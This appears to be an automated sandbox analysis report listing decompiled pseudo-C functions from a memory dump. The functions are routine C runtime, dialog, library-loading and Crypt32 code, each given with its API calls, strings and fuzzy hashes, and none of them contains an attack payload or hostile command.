TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008409E3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008409F3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008409FF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 68ec5e376f1e97b19e74fc757a521d1723042646b62a4ee3d301de9aad4dd782
Instruction ID: c436f2f57f416bc73a58ca44ff99ddad4d6418040d13c7083abd4c2beb3b2321
Opcode Fuzzy Hash: 68ec5e376f1e97b19e74fc757a521d1723042646b62a4ee3d301de9aad4dd782
Instruction Fuzzy Hash: DA31D57A1083459BC704DFA9C88099BB7E8FF98704F04591EFA99C3210E730E549CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00848C4D, Relevance: 9.1, APIs: 6, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00848C4D(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E0084F3CA(_a8, 0x8640bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E0084F3CA(_t32, 0x8640fc, _t25) != 0) {
						if(E0084F3CA(_t32, 0x8640dc, _t25) != 0) {
							if(E0084F3CA(_t32, 0x8640ac, _t25) != 0) {
								if(E0084F3CA(_t32, 0x86414c, _t25) != 0) {
									if(E0084F3CA(_t32, 0x86409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x00848c51
0x00848c56
0x00848c64
0x00848c69
0x00848c7b
0x00848d0a
0x00848d0a
0x00848d0d
0x00848d0f
0x00848d12
0x00848d15
0x00848d21
0x00000000
0x00848d22
0x00848c92
0x00848cad
0x00848cc8
0x00848ce3
0x00848d08
0x00848d19
0x00848d1c
0x00000000
0x00848d1c
0x00000000
0x00848d08
0x00848ce5
0x00848ce8
0x00848ceb
0x00848cef
0x00848cf3
0x00000000
0x00848cf3
0x00848cca
0x00848ccd
0x00000000
0x00848ccd
0x00848caf
0x00848cb2
0x00000000
0x00848cb2
0x00848c94
0x00848c97
0x00000000
0x00848c97
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 00848C71
_memcmp.LIBVCRUNTIME ref: 00848C88

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6ab6cfe47100e64d9df8960f543776835446a8d94c068247af72bd4372c9cfe8
Instruction ID: aa08ccb8bcc13dde0866b1a0f97bf5a484c6964da4231ccf7c618011b548e105
Opcode Fuzzy Hash: 6ab6cfe47100e64d9df8960f543776835446a8d94c068247af72bd4372c9cfe8
Instruction Fuzzy Hash: 9B21AF72A0120EEBDB149E14CC81F3F77ACFB60748F119529FD04DB242EA34ED4586A2

Uniqueness

Uniqueness Score: -1.00%

Function 00858571, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00858571(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x86d6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00857B91(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00859C04(_t25, _t36, __eflags,  *0x86d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E008583E3(_t25, _t31, 0x890418);
							E00857AC6(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00857AC6();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00857B4E(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x86d6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00857B91(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00859C04(_t27, _t37, __eflags,  *0x86d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E008583E3(_t27, _t32, 0x890418);
									E00857AC6(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00857AC6();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00859BAE(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00859BAE(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00858571
0x00858571
0x00858571
0x0085857b
0x0085857d
0x00858582
0x00858585
0x00858593
0x0085859a
0x0085859f
0x008585a2
0x008585a5
0x008585b7
0x008585bc
0x008585be
0x008585c9
0x008585d0
0x008585d5
0x008585d8
0x008585da
0x00000000
0x00000000
0x00000000
0x00000000
0x008585c0
0x008585c0
0x00000000
0x008585c0
0x008585a7
0x008585a7
0x008585a8
0x008585a8
0x008585ad
0x008585e8
0x008585e9
0x008585ef
0x008585f4
0x008585f7
0x008585f8
0x008585f9
0x00858600
0x00858602
0x00858604
0x00858609
0x0085860c
0x0085861a
0x00858626
0x00858629
0x0085862c
0x0085863e
0x00858643
0x00858645
0x00858650
0x00858656
0x0085865e
0x00858660
0x00000000
0x00000000
0x00000000
0x00000000
0x00858647
0x00858647
0x00000000
0x00858647
0x0085862e
0x0085862e
0x0085862f
0x0085862f
0x00858662
0x00858663
0x00858663
0x0085860e
0x00858614
0x00858618
0x0085866b
0x0085866c
0x00858672
0x00000000
0x00000000
0x00000000
0x00858618
0x00858679
0x00858679
0x00858587
0x0085858d
0x00858591
0x008585dc
0x008585dd
0x008585e7
0x00000000
0x00000000
0x00000000
0x00858591

APIs

GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
_free.LIBCMT ref: 008585A8
_free.LIBCMT ref: 008585D0
SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585DD
SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
_abort.LIBCMT ref: 008585EF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3f97f58a7402b9d1dfbeb783a5e610ee1d5b26206cf61973870f0291547cc553
Instruction ID: 165b76a93e88303c57b5d8065ebefa0b797ee49780f08bf412df8b560cc1bf59
Opcode Fuzzy Hash: 3f97f58a7402b9d1dfbeb783a5e610ee1d5b26206cf61973870f0291547cc553
Instruction Fuzzy Hash: 08F0A436248A10BBD6127728BC07E5B255AFBE1733F264156FD14E2291FE618A098563

Uniqueness

Uniqueness Score: -1.00%

Function 0083CE9B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0083CE9B(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00841222( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0083FA8C(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0083DA25();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00854EB6(_t42, _t43, _t44, _t46, _t48 + 0x58,  *((intOrPtr*)(_t46 + 0x14)),  *((intOrPtr*)(_t46 + 0x18)), 4, E0083CCDA);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x86d158 +  *_t30 * 0xc; // 0x8633e0
						E00855520( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0083ce9b
0x0083ce9b
0x0083ce9b
0x0083ce9c
0x0083cea0
0x0083cea7
0x0083cead
0x0083cebd
0x0083cec3
0x0083cec7
0x0083ceca
0x0083ced5
0x0083ced5
0x0083cedd
0x0083cee0
0x0083cf1b
0x0083cee2
0x0083cee2
0x0083cee5
0x0083cefa
0x0083cefb
0x00000000
0x0083cee7
0x0083ceea
0x0083ceef
0x0083cef0
0x0083cf00
0x0083cf03
0x0083cf05
0x0083cf06
0x0083cf0b
0x0083cf0b
0x0083ceea
0x0083cee5
0x0083cf31
0x0083cf3b
0x00000000
0x0083cf41
0x0083cf47
0x0083cf50
0x0083cf58
0x0083cf58
0x0083ceaf
0x0083ceaf
0x0083ceaf
0x0083ceaf
0x0083cf5f

APIs

__fprintf_l.LIBCMT ref: 0083CF06
_strncpy.LIBCMT ref: 0083CF50

Strings

@%s, xrefs: 0083CEF0
0Z, xrefs: 0083CEA6
$%s, xrefs: 0083CEFB

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$0Z$@%s
API String ID: 1857242416-1489973951
Opcode ID: 251c9a26a2e411cb11cb6cdd524c2ef38be0adee7c6b0d679726dade8e0182be
Instruction ID: 4bc1cfde0e4d1b44e7ef36368eab054d725af4171ab5b57a3fbd8a6de46c6ea8
Opcode Fuzzy Hash: 251c9a26a2e411cb11cb6cdd524c2ef38be0adee7c6b0d679726dade8e0182be
Instruction Fuzzy Hash: F9216D72940208AFDF20DEA8DD05FEE7BA8FB54300F000112F915E61A2E7B5D658CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0084C2FD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0084C2FD(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E008312D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0x88de34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0x88de34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0x88de34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0084c2fe
0x0084c303
0x0084c308
0x0084c30d
0x0084c325
0x0084c385
0x00000000
0x0084c387
0x0084c327
0x0084c32d
0x0084c372
0x0084c378
0x0084c383
0x00000000
0x0084c383
0x0084c332
0x0084c341
0x00000000
0x0084c341
0x0084c337
0x0084c33a
0x0084c35e
0x0084c364
0x0084c347
0x0084c348
0x00000000
0x0084c348
0x0084c33f
0x0084c345
0x00000000
0x0084c345
0x00000000

APIs

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

EndDialog.USER32(?,00000001), ref: 0084C348
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0084C35E
SetDlgItemTextW.USER32(?,00000066,?), ref: 0084C378
SetDlgItemTextW.USER32(?,00000068), ref: 0084C383

Strings

RENAMEDLG, xrefs: 0084C315

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 6d136850b5b99ab3e337e001ef92fb83fee35ea6cc358a428b75474842cb35ee
Instruction ID: 83cce49902ee5393301cf1dedcff9db36781e770b1ade312c610ec1bcd42fff9
Opcode Fuzzy Hash: 6d136850b5b99ab3e337e001ef92fb83fee35ea6cc358a428b75474842cb35ee
Instruction Fuzzy Hash: AE01F133A8231876E2505E696E49F3B7B6CF796B00F014015F201F62D0C6D2AC009772

Uniqueness

Uniqueness Score: -1.00%

Function 00856B9E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00856B9E(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				struct HINSTANCE__** _t12;
				intOrPtr* _t23;
				signed int _t25;

				_t10 =  *0x86d668; // 0x14325215
				_v8 = _t10 ^ _t25;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t23 = GetProcAddress(_v12, "CorExitProcess");
					if(_t23 != 0) {
						 *0x862260(_a4);
						 *_t23();
					}
				}
				if(_v12 != 0) {
					FreeLibrary(_v12);
				}
				return E0084E243(_v8 ^ _t25);
			}

0x00856ba5
0x00856bac
0x00856baf
0x00856bb3
0x00856bbe
0x00856bc6
0x00856bd7
0x00856bdb
0x00856be2
0x00856be8
0x00856be8
0x00856bea
0x00856bef
0x00856bf4
0x00856bf4
0x00856c07

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00856B4F,?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002), ref: 00856BBE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00856BD1
FreeLibrary.KERNEL32(00000000,?,?,?,00856B4F,?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856BF4

Strings

CorExitProcess, xrefs: 00856BC9
mscoree.dll, xrefs: 00856BB7

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 879b700da92a81b41f2c3727b0779b048be680c001c8b7f8af0d84338e95de67
Instruction ID: ee52da62f8f98247f8264de7d89e904084cb8cea53714680bb9a110764738f55
Opcode Fuzzy Hash: 879b700da92a81b41f2c3727b0779b048be680c001c8b7f8af0d84338e95de67
Instruction Fuzzy Hash: D8F04431A05619BBCB159B94DC09F9EBFB8FB04716F4100A4F905E6260DBB49E54CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0083E819, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0083E819(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E0083FD16(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0083e81a
0x0083e820
0x0083e827
0x0083e82c
0x0083e830
0x0083e845
0x0083e848
0x0083e84e
0x0083e84e
0x0083e851
0x00000000
0x0083e851
0x0083e856

APIs

Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083E838
GetProcAddress.KERNEL32(00877350,CryptUnprotectMemory), ref: 0083E848

Strings

CryptProtectMemory, xrefs: 0083E832
CryptUnprotectMemory, xrefs: 0083E83E
Crypt32.dll, xrefs: 0083E822

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 67bc66ea218d10effc8e39d6a74661b75964e93362f5bfe7946e37ce92960b5f
Instruction ID: d82043c7b8b95ba8191d8b8b5304a633191948a7c9b20c245992109830698556
Opcode Fuzzy Hash: 67bc66ea218d10effc8e39d6a74661b75964e93362f5bfe7946e37ce92960b5f
Instruction Fuzzy Hash: D9E04FB0905E47ABCF005B34E808601FBA4FB60700F1186A9F124D36D1EBB8D050CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008573AF, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E008573AF(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x86d668; // 0x14325215
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E008576B1( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00852739(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00852739(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00852739(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0085AC84(_t56);
						_t40 = E00857AC6(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0085AC84(_t56);
						E00857AC6(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x86d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x008573af
0x008573b9
0x008573bd
0x008573bf
0x008573c3
0x008573cd
0x008573de
0x008573e3
0x008573e5
0x008573e7
0x008573e9
0x008573eb
0x008573ef
0x008574a9
0x008574b7
0x008574b9
0x008574be
0x008574c5
0x008574c7
0x008574d5
0x008574e4
0x008574e7
0x008574e9
0x00000000
0x008574ea
0x008573f7
0x008573fc
0x00857401
0x00857403
0x00857403
0x00857405
0x0085740a
0x0085740e
0x0085740e
0x00857411
0x00857430
0x00857430
0x00857432
0x00857435
0x0085743e
0x00857441
0x00857446
0x00857449
0x0085744e
0x00000000
0x00000000
0x00857450
0x00000000
0x00857413
0x00857413
0x00857415
0x0085741e
0x00857421
0x00857426
0x00857429
0x0085742e
0x00857458
0x0085745b
0x0085745d
0x00857460
0x00857468
0x0085746e
0x00857475
0x00857477
0x0085747f
0x0085748e
0x00857492
0x00857494
0x00857497
0x00000000
0x00000000
0x00857499
0x0085749c
0x0085749e
0x0085749e
0x0085749f
0x008574a1
0x008574a4
0x00000000
0x0085749e
0x00000000
0x0085742e
0x00857411
0x00000000

APIs

_free.LIBCMT ref: 00857421
_free.LIBCMT ref: 00857441

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2f64251ab4fd68ed3c8323f828f4ef687f4deb6c594fb87da0b8055d88064a01
Instruction ID: c4f03dc96af735d2cb6bc60903eb6feec84a97cf6ea4592d31c96c4f18659866
Opcode Fuzzy Hash: 2f64251ab4fd68ed3c8323f828f4ef687f4deb6c594fb87da0b8055d88064a01
Instruction Fuzzy Hash: 9741F232A003109FCB24DF78D881A5DBBB5FF89325B1585A9E905EB391DB30AD09CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0085AC01, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0085AC01() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0085ABCA(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00857B00(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00857AC6(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0085ac10
0x0085ac16
0x0085ac6e
0x0085ac6e
0x0085ac18
0x0085ac19
0x0085ac1e
0x0085ac27
0x0085ac2d
0x0085ac33
0x0085ac38
0x00000000
0x0085ac3a
0x0085ac40
0x0085ac45
0x0085ac63
0x0085ac5d
0x0085ac5d
0x0085ac5f
0x0085ac5f
0x0085ac66
0x0085ac6b
0x0085ac38
0x0085ac72
0x0085ac75
0x0085ac75
0x0085ac83

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0085AC0A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085AC2D

Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32

